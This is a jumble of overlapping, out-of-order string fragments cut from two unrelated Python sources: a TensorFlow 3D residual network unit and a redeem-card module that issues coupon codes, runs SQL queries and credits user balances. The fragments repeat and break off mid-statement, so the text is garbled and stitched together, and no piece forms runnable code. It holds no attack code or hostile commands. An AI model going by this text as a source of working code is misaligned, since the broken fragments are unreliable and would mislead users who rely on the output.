kernel_size (tuple, optional): Size of the", "of the residual unit \"\"\" pool_op = tf.layers.max_pooling3d conv_params = {'padding': 'same', 'use_bias':", "tf import numpy as np def vanilla_residual_unit_3d(inputs, out_filters, kernel_size=(3, 3, 3), strides=(1, 1,", "regularisation op bias_regularizer (None, optional): Additional regularisation op Returns: tf.Tensor: Output of the", "= tf.layers.max_pooling3d conv_params = {'padding': 'same', 'use_bias': use_bias, 'kernel_initializer': kernel_initializer, 'bias_initializer': bias_initializer, 'kernel_regularizer':", "a bias with each convolution. kernel_initializer (TYPE, optional): Initialisation of convolution kernels bias_initializer", "Additional regularisation op bias_regularizer (None, optional): Additional regularisation op Returns: tf.Tensor: Output of", "Input tensor to the residual unit. Is required to have a rank of", "/ 2.)), int(np.ceil((out_filters - in_filters) / 2.))]]) elif in_filters > out_filters: orig_x =", "tf.estimator.ModeKeys.TRAIN) x = activation(x) x = tf.layers.conv3d( inputs=x, filters=out_filters, kernel_size=kernel_size, strides=(1, 1, 1),", "(bool, optional): Train a bias with each convolution. kernel_initializer (TYPE, optional): Initialisation of", "= inputs orig_x = x # Handle strided convolutions if np.prod(strides) != 1:", "sub units. kernel_size (tuple, optional): Size of the convoltional kernels used in the", "orig_x = x # Handle strided convolutions if np.prod(strides) != 1: orig_x =", "the residual with tf.variable_scope('sub_unit_add'): # Handle differences in input and output filter sizes", "x, y, z, channels]). out_filters (int): Number of convolutional filters used in the", "'kernel_initializer': kernel_initializer, 'bias_initializer': bias_initializer, 'kernel_regularizer': kernel_regularizer, 'bias_regularizer': bias_regularizer} in_filters = inputs.get_shape().as_list()[-1] assert in_filters", "(tuple, optional): Convolution strides in (x,y,z) of sub unit 0. 
Allows downsampling of", "**conv_params) # Add the residual with tf.variable_scope('sub_unit_add'): # Handle differences in input and", "\"\"\" pool_op = tf.layers.max_pooling3d conv_params = {'padding': 'same', 'use_bias': use_bias, 'kernel_initializer': kernel_initializer, 'bias_initializer':", "Residual Networks. ECCV 2016. Args: inputs (tf.Tensor): Input tensor to the residual unit.", "'Module was initialised for a different input shape' x = inputs orig_x =", "bias_initializer, 'kernel_regularizer': kernel_regularizer, 'bias_regularizer': bias_regularizer} in_filters = inputs.get_shape().as_list()[-1] assert in_filters == inputs.get_shape().as_list()[-1], \\", "- 1) + [[ int(np.floor((out_filters - in_filters) / 2.)), int(np.ceil((out_filters - in_filters) /", "import division from __future__ import absolute_import import tensorflow as tf import numpy as", "use_bias, 'kernel_initializer': kernel_initializer, 'bias_initializer': bias_initializer, 'kernel_regularizer': kernel_regularizer, 'bias_regularizer': bias_regularizer} in_filters = inputs.get_shape().as_list()[-1] assert", "# Sub unit 0 with tf.variable_scope('sub_unit0'): # Adjust the strided conv kernel size", "the tf.estimator.ModeKeys: TRAIN, EVAL or PREDICT activation (optional): A function to use as", "inputs (tf.Tensor): Input tensor to the residual unit. Is required to have a", "inputs.get_shape().as_list()[-1] assert in_filters == inputs.get_shape().as_list()[-1], \\ 'Module was initialised for a different input", "unit 0. Allows downsampling of the input tensor via strides convolutions. 
mode (str,", "kernel_size=(3, 3, 3), strides=(1, 1, 1), mode=tf.estimator.ModeKeys.EVAL, use_bias=False, activation=tf.nn.relu6, kernel_initializer=tf.initializers.variance_scaling(distribution='uniform'), bias_initializer=tf.zeros_initializer(), kernel_regularizer=None, bias_regularizer=None):", "# Add the residual with tf.variable_scope('sub_unit_add'): # Handle differences in input and output", "downsampling of the input tensor via strides convolutions. mode (str, optional): One of", "with tf.variable_scope('sub_unit1'): x = tf.layers.batch_normalization( x, training=mode == tf.estimator.ModeKeys.TRAIN) x = activation(x) x", "0]] * (len(x.get_shape().as_list()) - 1) + [[ int(np.floor((out_filters - in_filters) / 2.)), int(np.ceil((out_filters", "== tf.estimator.ModeKeys.TRAIN) x = activation(x) x = tf.layers.conv3d( inputs=x, filters=out_filters, kernel_size=kernel_size, strides=(1, 1,", "int(np.ceil((out_filters - in_filters) / 2.))]]) elif in_filters > out_filters: orig_x = tf.layers.conv3d( inputs=orig_x,", "= [s * 2 if s > 1 else k for k, s", "activation(x) x = tf.layers.conv3d( inputs=x, filters=out_filters, kernel_size=kernel_size, strides=(1, 1, 1), **conv_params) # Add", "This implementation supports strided convolutions and automatically handles different input and output filters.", "bias_regularizer} in_filters = inputs.get_shape().as_list()[-1] assert in_filters == inputs.get_shape().as_list()[-1], \\ 'Module was initialised for", "in_filters = inputs.get_shape().as_list()[-1] assert in_filters == inputs.get_shape().as_list()[-1], \\ 'Module was initialised for a", "2.))]]) elif in_filters > out_filters: orig_x = tf.layers.conv3d( inputs=orig_x, filters=out_filters, kernel_size=kernel_size, strides=(1, 1,", "import print_function from __future__ import division from __future__ import absolute_import import tensorflow as", "unit 1 with tf.variable_scope('sub_unit1'): x = tf.layers.batch_normalization( x, training=mode == tf.estimator.ModeKeys.TRAIN) x 
=", "\"\"\"Implementation of a 3D residual unit according to [1]. This implementation supports strided", "different input shape' x = inputs orig_x = x # Handle strided convolutions", "as activation function. use_bias (bool, optional): Train a bias with each convolution. kernel_initializer", "optional): Initialisation of bias kernel_regularizer (None, optional): Additional regularisation op bias_regularizer (None, optional):", "k for k, s in zip(kernel_size, strides)] x = tf.layers.batch_normalization( x, training=mode ==", "[s * 2 if s > 1 else k for k, s in", "x = tf.layers.batch_normalization( x, training=mode == tf.estimator.ModeKeys.TRAIN) x = activation(x) x = tf.layers.conv3d(", "{'padding': 'same', 'use_bias': use_bias, 'kernel_initializer': kernel_initializer, 'bias_initializer': bias_initializer, 'kernel_regularizer': kernel_regularizer, 'bias_regularizer': bias_regularizer} in_filters", "division from __future__ import absolute_import import tensorflow as tf import numpy as np", "Returns: tf.Tensor: Output of the residual unit \"\"\" pool_op = tf.layers.max_pooling3d conv_params =", "inputs=x, filters=out_filters, kernel_size=kernel_size, strides=(1, 1, 1), **conv_params) # Add the residual with tf.variable_scope('sub_unit_add'):", "'bias_regularizer': bias_regularizer} in_filters = inputs.get_shape().as_list()[-1] assert in_filters == inputs.get_shape().as_list()[-1], \\ 'Module was initialised", "tf.estimator.ModeKeys: TRAIN, EVAL or PREDICT activation (optional): A function to use as activation", "of convolution kernels bias_initializer (TYPE, optional): Initialisation of bias kernel_regularizer (None, optional): Additional", "units strides (tuple, optional): Convolution strides in (x,y,z) of sub unit 0. 
Allows", "from __future__ import unicode_literals from __future__ import print_function from __future__ import division from", "kernels used in the sub units strides (tuple, optional): Convolution strides in (x,y,z)", "= activation(x) x = tf.layers.conv3d( inputs=x, filters=out_filters, kernel_size=k, strides=strides, **conv_params) # Sub unit", "pool_op = tf.layers.max_pooling3d conv_params = {'padding': 'same', 'use_bias': use_bias, 'kernel_initializer': kernel_initializer, 'bias_initializer': bias_initializer,", "optional): Initialisation of convolution kernels bias_initializer (TYPE, optional): Initialisation of bias kernel_regularizer (None,", "0. Allows downsampling of the input tensor via strides convolutions. mode (str, optional):", "z, channels]). out_filters (int): Number of convolutional filters used in the sub units.", "conv_params = {'padding': 'same', 'use_bias': use_bias, 'kernel_initializer': kernel_initializer, 'bias_initializer': bias_initializer, 'kernel_regularizer': kernel_regularizer, 'bias_regularizer':", "unit. Is required to have a rank of 5 (i.e. 
[batch, x, y,", "initialised for a different input shape' x = inputs orig_x = x #", "in_filters > out_filters: orig_x = tf.layers.conv3d( inputs=orig_x, filters=out_filters, kernel_size=kernel_size, strides=(1, 1, 1), **conv_params)", "k = [s * 2 if s > 1 else k for k,", "= tf.layers.conv3d( inputs=x, filters=out_filters, kernel_size=k, strides=strides, **conv_params) # Sub unit 1 with tf.variable_scope('sub_unit1'):", "mode (str, optional): One of the tf.estimator.ModeKeys: TRAIN, EVAL or PREDICT activation (optional):", "convoltional kernels used in the sub units strides (tuple, optional): Convolution strides in", "1: orig_x = pool_op(inputs=orig_x, pool_size=strides, strides=strides, padding='valid') # Sub unit 0 with tf.variable_scope('sub_unit0'):", "Sub unit 1 with tf.variable_scope('sub_unit1'): x = tf.layers.batch_normalization( x, training=mode == tf.estimator.ModeKeys.TRAIN) x", "strides (tuple, optional): Convolution strides in (x,y,z) of sub unit 0. Allows downsampling", "- in_filters) / 2.))]]) elif in_filters > out_filters: orig_x = tf.layers.conv3d( inputs=orig_x, filters=out_filters,", "tensor to the residual unit. Is required to have a rank of 5", "(None, optional): Additional regularisation op Returns: tf.Tensor: Output of the residual unit \"\"\"", "the sub units strides (tuple, optional): Convolution strides in (x,y,z) of sub unit", "**conv_params) # Sub unit 1 with tf.variable_scope('sub_unit1'): x = tf.layers.batch_normalization( x, training=mode ==", "(tf.Tensor): Input tensor to the residual unit. Is required to have a rank", "the input tensor via strides convolutions. mode (str, optional): One of the tf.estimator.ModeKeys:", "input tensor via strides convolutions. mode (str, optional): One of the tf.estimator.ModeKeys: TRAIN,", "Mappings in Deep Residual Networks. ECCV 2016. Args: inputs (tf.Tensor): Input tensor to", "each convolution. 
kernel_initializer (TYPE, optional): Initialisation of convolution kernels bias_initializer (TYPE, optional): Initialisation", "tf.variable_scope('sub_unit_add'): # Handle differences in input and output filter sizes if in_filters <", "1, 1), **conv_params) # Add the residual with tf.variable_scope('sub_unit_add'): # Handle differences in", "'bias_initializer': bias_initializer, 'kernel_regularizer': kernel_regularizer, 'bias_regularizer': bias_regularizer} in_filters = inputs.get_shape().as_list()[-1] assert in_filters == inputs.get_shape().as_list()[-1],", "A function to use as activation function. use_bias (bool, optional): Train a bias", "Additional regularisation op Returns: tf.Tensor: Output of the residual unit \"\"\" pool_op =", "1), mode=tf.estimator.ModeKeys.EVAL, use_bias=False, activation=tf.nn.relu6, kernel_initializer=tf.initializers.variance_scaling(distribution='uniform'), bias_initializer=tf.zeros_initializer(), kernel_regularizer=None, bias_regularizer=None): \"\"\"Implementation of a 3D residual", "x = tf.layers.conv3d( inputs=x, filters=out_filters, kernel_size=kernel_size, strides=(1, 1, 1), **conv_params) # Add the", "of convolutional filters used in the sub units. kernel_size (tuple, optional): Size of", "of bias kernel_regularizer (None, optional): Additional regularisation op bias_regularizer (None, optional): Additional regularisation", "Initialisation of bias kernel_regularizer (None, optional): Additional regularisation op bias_regularizer (None, optional): Additional", "s > 1 else k for k, s in zip(kernel_size, strides)] x =", "(TYPE, optional): Initialisation of bias kernel_regularizer (None, optional): Additional regularisation op bias_regularizer (None,", "automatically handles different input and output filters. [1] <NAME> et al. 
Identity Mappings", "x # Handle strided convolutions if np.prod(strides) != 1: orig_x = pool_op(inputs=orig_x, pool_size=strides,", "= tf.pad( tensor=orig_x, paddings=[[0, 0]] * (len(x.get_shape().as_list()) - 1) + [[ int(np.floor((out_filters -", "Handle differences in input and output filter sizes if in_filters < out_filters: orig_x", "tensorflow as tf import numpy as np def vanilla_residual_unit_3d(inputs, out_filters, kernel_size=(3, 3, 3),", "convolutions. mode (str, optional): One of the tf.estimator.ModeKeys: TRAIN, EVAL or PREDICT activation", "(str, optional): One of the tf.estimator.ModeKeys: TRAIN, EVAL or PREDICT activation (optional): A", "from __future__ import absolute_import import tensorflow as tf import numpy as np def", "unicode_literals from __future__ import print_function from __future__ import division from __future__ import absolute_import", "x = activation(x) x = tf.layers.conv3d( inputs=x, filters=out_filters, kernel_size=kernel_size, strides=(1, 1, 1), **conv_params)", "or PREDICT activation (optional): A function to use as activation function. 
use_bias (bool,", "strides=(1, 1, 1), mode=tf.estimator.ModeKeys.EVAL, use_bias=False, activation=tf.nn.relu6, kernel_initializer=tf.initializers.variance_scaling(distribution='uniform'), bias_initializer=tf.zeros_initializer(), kernel_regularizer=None, bias_regularizer=None): \"\"\"Implementation of a", "print_function from __future__ import division from __future__ import absolute_import import tensorflow as tf", "for k, s in zip(kernel_size, strides)] x = tf.layers.batch_normalization( x, training=mode == tf.estimator.ModeKeys.TRAIN)", "op Returns: tf.Tensor: Output of the residual unit \"\"\" pool_op = tf.layers.max_pooling3d conv_params", "residual unit \"\"\" pool_op = tf.layers.max_pooling3d conv_params = {'padding': 'same', 'use_bias': use_bias, 'kernel_initializer':", "/ 2.))]]) elif in_filters > out_filters: orig_x = tf.layers.conv3d( inputs=orig_x, filters=out_filters, kernel_size=kernel_size, strides=(1,", "prevent losing information k = [s * 2 if s > 1 else", "filters=out_filters, kernel_size=kernel_size, strides=(1, 1, 1), **conv_params) # Add the residual with tf.variable_scope('sub_unit_add'): #", "strided convolutions if np.prod(strides) != 1: orig_x = pool_op(inputs=orig_x, pool_size=strides, strides=strides, padding='valid') #", "[1] <NAME> et al. Identity Mappings in Deep Residual Networks. ECCV 2016. Args:", "residual with tf.variable_scope('sub_unit_add'): # Handle differences in input and output filter sizes if", "differences in input and output filter sizes if in_filters < out_filters: orig_x =", "strided convolutions and automatically handles different input and output filters. [1] <NAME> et", "pool_size=strides, strides=strides, padding='valid') # Sub unit 0 with tf.variable_scope('sub_unit0'): # Adjust the strided", "use as activation function. 
use_bias (bool, optional): Train a bias with each convolution.", "convolutions if np.prod(strides) != 1: orig_x = pool_op(inputs=orig_x, pool_size=strides, strides=strides, padding='valid') # Sub", "with tf.variable_scope('sub_unit_add'): # Handle differences in input and output filter sizes if in_filters", "pool_op(inputs=orig_x, pool_size=strides, strides=strides, padding='valid') # Sub unit 0 with tf.variable_scope('sub_unit0'): # Adjust the", "to prevent losing information k = [s * 2 if s > 1", "in Deep Residual Networks. ECCV 2016. Args: inputs (tf.Tensor): Input tensor to the", "convolution. kernel_initializer (TYPE, optional): Initialisation of convolution kernels bias_initializer (TYPE, optional): Initialisation of", "kernels bias_initializer (TYPE, optional): Initialisation of bias kernel_regularizer (None, optional): Additional regularisation op" ]
[ "should have bias=False # but this does not have an effect due to", "c): super(DenseOmega, self).__init__() self.n = n self.c = c # self.fc should have", "an effect due to the custom forward pass below # the bug was", "custom forward pass below # the bug was not fixed to maintain compatibility", "# self.fc should have bias=False # but this does not have an effect", "not fixed to maintain compatibility with older model checkpoints self.fc = nn.Linear(n*c, n*c)", "= v.reshape((batch, self.c*self.n, 1)) y1 = torch.matmul(self.fc.weight, x) y2 = torch.matmul(self.fc.weight.t(), x) return", "but this does not have an effect due to the custom forward pass", "model checkpoints self.fc = nn.Linear(n*c, n*c) def forward(self, v): batch = v.shape[0] x", "1). \"\"\" def __init__(self, n, c): super(DenseOmega, self).__init__() self.n = n self.c =", "shape (batch, c, n, 1). \"\"\" def __init__(self, n, c): super(DenseOmega, self).__init__() self.n", "forward(self, v): batch = v.shape[0] x = v.reshape((batch, self.c*self.n, 1)) y1 = torch.matmul(self.fc.weight,", "due to the custom forward pass below # the bug was not fixed", "the bug was not fixed to maintain compatibility with older model checkpoints self.fc", "torch import torch.nn as nn class DenseOmega(nn.Module): \"\"\" Dense (+symmetric) Omega matrix which", "= v.shape[0] x = v.reshape((batch, self.c*self.n, 1)) y1 = torch.matmul(self.fc.weight, x) y2 =", "__init__(self, n, c): super(DenseOmega, self).__init__() self.n = n self.c = c # self.fc", "have an effect due to the custom forward pass below # the bug", "x) y2 = torch.matmul(self.fc.weight.t(), x) return 0.5*(y1+y2).reshape((batch, self.c, self.n, 1)) def dense_matrix(self): return", "older model checkpoints self.fc = nn.Linear(n*c, n*c) def forward(self, v): batch = v.shape[0]", "self.fc should have bias=False # but this does not have an effect due", "DenseOmega(nn.Module): \"\"\" Dense (+symmetric) Omega matrix which applies to vectorized state with shape", 
"batch = v.shape[0] x = v.reshape((batch, self.c*self.n, 1)) y1 = torch.matmul(self.fc.weight, x) y2", "with shape (batch, c, n, 1). \"\"\" def __init__(self, n, c): super(DenseOmega, self).__init__()", "effect due to the custom forward pass below # the bug was not", "the custom forward pass below # the bug was not fixed to maintain", "import torch.nn as nn class DenseOmega(nn.Module): \"\"\" Dense (+symmetric) Omega matrix which applies", "v.reshape((batch, self.c*self.n, 1)) y1 = torch.matmul(self.fc.weight, x) y2 = torch.matmul(self.fc.weight.t(), x) return 0.5*(y1+y2).reshape((batch,", "self.n = n self.c = c # self.fc should have bias=False # but", "bias=False # but this does not have an effect due to the custom", "# but this does not have an effect due to the custom forward", "(+symmetric) Omega matrix which applies to vectorized state with shape (batch, c, n,", "torch.nn as nn class DenseOmega(nn.Module): \"\"\" Dense (+symmetric) Omega matrix which applies to", "c, n, 1). \"\"\" def __init__(self, n, c): super(DenseOmega, self).__init__() self.n = n", "v.shape[0] x = v.reshape((batch, self.c*self.n, 1)) y1 = torch.matmul(self.fc.weight, x) y2 = torch.matmul(self.fc.weight.t(),", "# the bug was not fixed to maintain compatibility with older model checkpoints", "with older model checkpoints self.fc = nn.Linear(n*c, n*c) def forward(self, v): batch =", "= n self.c = c # self.fc should have bias=False # but this", "have bias=False # but this does not have an effect due to the", "state with shape (batch, c, n, 1). \"\"\" def __init__(self, n, c): super(DenseOmega,", "applies to vectorized state with shape (batch, c, n, 1). 
\"\"\" def __init__(self,", "nn class DenseOmega(nn.Module): \"\"\" Dense (+symmetric) Omega matrix which applies to vectorized state", "Dense (+symmetric) Omega matrix which applies to vectorized state with shape (batch, c,", "to maintain compatibility with older model checkpoints self.fc = nn.Linear(n*c, n*c) def forward(self,", "1)) y1 = torch.matmul(self.fc.weight, x) y2 = torch.matmul(self.fc.weight.t(), x) return 0.5*(y1+y2).reshape((batch, self.c, self.n,", "self.c*self.n, 1)) y1 = torch.matmul(self.fc.weight, x) y2 = torch.matmul(self.fc.weight.t(), x) return 0.5*(y1+y2).reshape((batch, self.c,", "= c # self.fc should have bias=False # but this does not have", "c # self.fc should have bias=False # but this does not have an", "n*c) def forward(self, v): batch = v.shape[0] x = v.reshape((batch, self.c*self.n, 1)) y1", "self).__init__() self.n = n self.c = c # self.fc should have bias=False #", "import torch import torch.nn as nn class DenseOmega(nn.Module): \"\"\" Dense (+symmetric) Omega matrix", "torch.matmul(self.fc.weight.t(), x) return 0.5*(y1+y2).reshape((batch, self.c, self.n, 1)) def dense_matrix(self): return 0.5*(self.fc.weight + self.fc.weight.t())", "was not fixed to maintain compatibility with older model checkpoints self.fc = nn.Linear(n*c,", "def forward(self, v): batch = v.shape[0] x = v.reshape((batch, self.c*self.n, 1)) y1 =", "n, 1). \"\"\" def __init__(self, n, c): super(DenseOmega, self).__init__() self.n = n self.c", "which applies to vectorized state with shape (batch, c, n, 1). 
\"\"\" def", "n, c): super(DenseOmega, self).__init__() self.n = n self.c = c # self.fc should", "= nn.Linear(n*c, n*c) def forward(self, v): batch = v.shape[0] x = v.reshape((batch, self.c*self.n,", "v): batch = v.shape[0] x = v.reshape((batch, self.c*self.n, 1)) y1 = torch.matmul(self.fc.weight, x)", "forward pass below # the bug was not fixed to maintain compatibility with", "y1 = torch.matmul(self.fc.weight, x) y2 = torch.matmul(self.fc.weight.t(), x) return 0.5*(y1+y2).reshape((batch, self.c, self.n, 1))", "= torch.matmul(self.fc.weight.t(), x) return 0.5*(y1+y2).reshape((batch, self.c, self.n, 1)) def dense_matrix(self): return 0.5*(self.fc.weight +", "matrix which applies to vectorized state with shape (batch, c, n, 1). \"\"\"", "to vectorized state with shape (batch, c, n, 1). \"\"\" def __init__(self, n,", "\"\"\" Dense (+symmetric) Omega matrix which applies to vectorized state with shape (batch,", "def __init__(self, n, c): super(DenseOmega, self).__init__() self.n = n self.c = c #", "to the custom forward pass below # the bug was not fixed to", "x = v.reshape((batch, self.c*self.n, 1)) y1 = torch.matmul(self.fc.weight, x) y2 = torch.matmul(self.fc.weight.t(), x)", "bug was not fixed to maintain compatibility with older model checkpoints self.fc =", "compatibility with older model checkpoints self.fc = nn.Linear(n*c, n*c) def forward(self, v): batch", "y2 = torch.matmul(self.fc.weight.t(), x) return 0.5*(y1+y2).reshape((batch, self.c, self.n, 1)) def dense_matrix(self): return 0.5*(self.fc.weight", "(batch, c, n, 1). 
\"\"\" def __init__(self, n, c): super(DenseOmega, self).__init__() self.n =", "below # the bug was not fixed to maintain compatibility with older model", "nn.Linear(n*c, n*c) def forward(self, v): batch = v.shape[0] x = v.reshape((batch, self.c*self.n, 1))", "Omega matrix which applies to vectorized state with shape (batch, c, n, 1).", "self.fc = nn.Linear(n*c, n*c) def forward(self, v): batch = v.shape[0] x = v.reshape((batch,", "= torch.matmul(self.fc.weight, x) y2 = torch.matmul(self.fc.weight.t(), x) return 0.5*(y1+y2).reshape((batch, self.c, self.n, 1)) def", "pass below # the bug was not fixed to maintain compatibility with older", "n self.c = c # self.fc should have bias=False # but this does", "\"\"\" def __init__(self, n, c): super(DenseOmega, self).__init__() self.n = n self.c = c", "super(DenseOmega, self).__init__() self.n = n self.c = c # self.fc should have bias=False", "vectorized state with shape (batch, c, n, 1). \"\"\" def __init__(self, n, c):", "maintain compatibility with older model checkpoints self.fc = nn.Linear(n*c, n*c) def forward(self, v):", "does not have an effect due to the custom forward pass below #", "as nn class DenseOmega(nn.Module): \"\"\" Dense (+symmetric) Omega matrix which applies to vectorized", "not have an effect due to the custom forward pass below # the", "torch.matmul(self.fc.weight, x) y2 = torch.matmul(self.fc.weight.t(), x) return 0.5*(y1+y2).reshape((batch, self.c, self.n, 1)) def dense_matrix(self):", "this does not have an effect due to the custom forward pass below", "self.c = c # self.fc should have bias=False # but this does not", "class DenseOmega(nn.Module): \"\"\" Dense (+symmetric) Omega matrix which applies to vectorized state with", "fixed to maintain compatibility with older model checkpoints self.fc = nn.Linear(n*c, n*c) def", "checkpoints self.fc = nn.Linear(n*c, n*c) def forward(self, v): batch = v.shape[0] x =" ]
[ "if not is_money(value) or not batch.isdecimal(): raise ValidationError('Invalid input type.') # Establish db", "the input data user_id = str(user_id).strip() redeem_code = str(redeem_code).strip() # Find redeem card", "{'redeem_code': generate_random_coupon_code(), 'value': value}) # Commit every 10 writes if (i + 1)", "value ) VALUES ( %(redeem_code)s, %(value)s )\"\"\" for i in range(int(batch)): cursor.execute(sql, {'redeem_code':", "redeem_code}) result = cursor.fetchone() return result def get_redeem_cards(limit = 0, offset = 0):", "redeem_card = find_redeem_card(redeem_code) if redeem_card is None: raise ValidationError('Invalid redeen code.') # Find", "= %(redeem_code)s\"\"\" cursor.execute(sql, {'redeem_code': redeem_code}) dao.commit() def find_redeem_card(redeem_code): # Clean the input data", "char set for the coupon code # Modify the char set according to", "WHERE redeem_code = %(redeem_code)s\"\"\" cursor.execute(sql, {'redeem_code': redeem_code}) result = cursor.fetchone() return result def", "the char set for the coupon code # Modify the char set according", "from models.DAO import DAO from utils.exception import ValidationError from utils.validation import is_money from", "the redeem card exists if find_redeem_card(redeem_code) is None: raise ValidationError('The redeem card does", "if (i + 1) % 10 == 0: dao.commit() dao.commit() def delete_redeem_card(redeem_code): #", "is None: raise ValidationError('user not found.') # Establish db connection dao = DAO()", "randint # Prepare the char set for the coupon code # Modify the", "= find_user(method = 'id', param = user_id) if user is None: raise ValidationError('user", "or not batch.isdecimal(): raise ValidationError('Invalid input type.') # Establish db connection dao =", "+ 1) % 10 == 0: dao.commit() dao.commit() def delete_redeem_card(redeem_code): # Clean the", "= user_id) if user is None: raise ValidationError('user not found.') # Establish db", "models.DAO import DAO from utils.exception import 
ValidationError from utils.validation import is_money from models.shared", "= \"\"\"DELETE FROM redeem_card WHERE redeem_code = %(redeem_code)s\"\"\" cursor.execute(sql, {'redeem_code': redeem_code}) dao.commit() def", "' LIMIT ' + limit + ' OFFSET ' + offset cursor.execute(sql) result", "FROM redeem_card ORDER BY redeem_code ASC\"\"\" if not int(limit) == 0: sql +=", "+ offset cursor.execute(sql) result = cursor.fetchall() return result def redeem(user_id, redeem_code): # Clean", "generate_random_coupon_code(): # Generate a coupon code of length 16 return ''.join([str(char_set[randint(0, len(char_set)-1)]) for", "0): # Clean the input data limit = str(limit).strip() offset = str(offset).strip() if", "not found.') # Establish db connection dao = DAO() cursor = dao.cursor() sql", "def redeem(user_id, redeem_code): # Clean the input data user_id = str(user_id).strip() redeem_code =", "16)]) def add_redeem_cards(value, batch = 1): # Clean the input data value =", "result def get_redeem_cards(limit = 0, offset = 0): # Clean the input data", "or not offset.isdecimal(): raise ValidationError('IInvalid pagination parameters.') # Establish db connection dao =", "= %(redeem_code)s\"\"\" cursor.execute(sql, {'redeem_code': redeem_code}) result = cursor.fetchone() return result def get_redeem_cards(limit =", "batch = 1): # Clean the input data value = str(value).strip() batch =", "redeem_card WHERE redeem_code = %(redeem_code)s\"\"\" cursor.execute(sql, {'redeem_code': redeem_code}) dao.commit() def find_redeem_card(redeem_code): # Clean", "redeem_card ORDER BY redeem_code ASC\"\"\" if not int(limit) == 0: sql += '", "== 0: dao.commit() dao.commit() def delete_redeem_card(redeem_code): # Clean the input data redeem_code =", "\"\"\"UPDATE user SET balance = %(new_balance)s WHERE user_id = %(user_id)s\"\"\" new_balance = user['balance']", "redeem_code}) dao.commit() def count_records_length(): # Establish db connection dao = DAO() cursor =", "from utils.validation import 
is_money from models.shared import find_user import string from random import", "input valid if not is_money(value) or not batch.isdecimal(): raise ValidationError('Invalid input type.') #", "def get_redeem_cards(limit = 0, offset = 0): # Clean the input data limit", "int(limit) == 0: sql += ' LIMIT ' + limit + ' OFFSET", "str(user_id).strip() redeem_code = str(redeem_code).strip() # Find redeem card redeem_card = find_redeem_card(redeem_code) if redeem_card", "redeem_code = str(redeem_code).strip() # Find redeem card redeem_card = find_redeem_card(redeem_code) if redeem_card is", "input data redeem_code = str(redeem_code).strip() # Establish db connection dao = DAO() cursor", "if redeem_card is None: raise ValidationError('Invalid redeen code.') # Find user user =", "FROM redeem_card WHERE redeem_code = %(redeem_code)s\"\"\" cursor.execute(sql, {'redeem_code': redeem_code}) result = cursor.fetchone() return", "sql = \"\"\"INSERT INTO redeem_card ( redeem_code, value ) VALUES ( %(redeem_code)s, %(value)s", "10 == 0: dao.commit() dao.commit() def delete_redeem_card(redeem_code): # Clean the input data redeem_code", "import randint # Prepare the char set for the coupon code # Modify", "# Clean the input data user_id = str(user_id).strip() redeem_code = str(redeem_code).strip() # Find", "= list(string.ascii_uppercase) [char_set.append(n) for n in range(0, 10)] def generate_random_coupon_code(): # Generate a", "the input data limit = str(limit).strip() offset = str(offset).strip() if not limit.isdecimal() or", "Clean the input data user_id = str(user_id).strip() redeem_code = str(redeem_code).strip() # Find redeem", "redeem_code = %(redeem_code)s\"\"\" cursor.execute(sql, {'redeem_code': redeem_code}) result = cursor.fetchone() return result def get_redeem_cards(limit", "your needs # The char set contains all upper case letters and 0", "INTO redeem_card ( redeem_code, value ) VALUES ( %(redeem_code)s, %(value)s )\"\"\" for i", "for i in range(int(batch)): 
cursor.execute(sql, {'redeem_code': generate_random_coupon_code(), 'value': value}) # Commit every 10", "% 10 == 0: dao.commit() dao.commit() def delete_redeem_card(redeem_code): # Clean the input data", "# Establish db connection dao = DAO() cursor = dao.cursor() sql = \"\"\"UPDATE", "= \"\"\"UPDATE user SET balance = %(new_balance)s WHERE user_id = %(user_id)s\"\"\" new_balance =", "case letters and 0 to 9 char_set = list(string.ascii_uppercase) [char_set.append(n) for n in", "exists if find_redeem_card(redeem_code) is None: raise ValidationError('The redeem card does not exists.') sql", "cursor.execute(sql, {'redeem_code': generate_random_coupon_code(), 'value': value}) # Commit every 10 writes if (i +", "raise ValidationError('Invalid redeen code.') # Find user user = find_user(method = 'id', param", "value}) # Commit every 10 writes if (i + 1) % 10 ==", "redeem card exists if find_redeem_card(redeem_code) is None: raise ValidationError('The redeem card does not", "Prepare the char set for the coupon code # Modify the char set", "sql = \"\"\"SELECT count(redeem_code) as len FROM redeem_card\"\"\" cursor.execute(sql) length = cursor.fetchone()['len'] return", "all upper case letters and 0 to 9 char_set = list(string.ascii_uppercase) [char_set.append(n) for", "result = cursor.fetchall() return result def redeem(user_id, redeem_code): # Clean the input data", "coupon code # Modify the char set according to your needs # The", "length 16 return ''.join([str(char_set[randint(0, len(char_set)-1)]) for n in range(0, 16)]) def add_redeem_cards(value, batch", "Establish db connection dao = DAO() cursor = dao.cursor() sql = \"\"\"UPDATE user", "for n in range(0, 10)] def generate_random_coupon_code(): # Generate a coupon code of", "the coupon code # Modify the char set according to your needs #", "import find_user import string from random import randint # Prepare the char set", "to your needs # The char set contains all upper case letters and", "found.') # Establish db 
connection dao = DAO() cursor = dao.cursor() sql =", "# Clean the input data param = str(redeem_code).strip() # Establish db connection dao", "input data user_id = str(user_id).strip() redeem_code = str(redeem_code).strip() # Find redeem card redeem_card", "FROM redeem_card WHERE redeem_code = %(redeem_code)s\"\"\" cursor.execute(sql, {'redeem_code': redeem_code}) dao.commit() def find_redeem_card(redeem_code): #", "'id', param = user_id) if user is None: raise ValidationError('user not found.') #", "cursor.execute(sql, {'redeem_code': redeem_code}) dao.commit() def count_records_length(): # Establish db connection dao = DAO()", "= user['balance'] + redeem_card['value'] cursor.execute(sql, {'new_balance': new_balance, 'user_id': user_id}) sql = \"\"\"DELETE FROM", "DAO() cursor = dao.cursor() # Query database sql = \"\"\"SELECT count(redeem_code) as len", "LIMIT ' + limit + ' OFFSET ' + offset cursor.execute(sql) result =", "char set contains all upper case letters and 0 to 9 char_set =", "Clean the input data param = str(redeem_code).strip() # Establish db connection dao =", "is the input valid if not is_money(value) or not batch.isdecimal(): raise ValidationError('Invalid input", "= dao.cursor() # Query database sql = \"\"\"SELECT count(redeem_code) as len FROM redeem_card\"\"\"", "if not limit.isdecimal() or not offset.isdecimal(): raise ValidationError('IInvalid pagination parameters.') # Establish db", "database sql = \"\"\"SELECT * FROM redeem_card ORDER BY redeem_code ASC\"\"\" if not", "{'redeem_code': redeem_code}) dao.commit() def count_records_length(): # Establish db connection dao = DAO() cursor", "parameters.') # Establish db connection dao = DAO() cursor = dao.cursor() # Query", "1) % 10 == 0: dao.commit() dao.commit() def delete_redeem_card(redeem_code): # Clean the input", "# Query database sql = \"\"\"SELECT * FROM redeem_card ORDER BY redeem_code ASC\"\"\"", "= DAO() cursor = dao.cursor() # Query database sql = 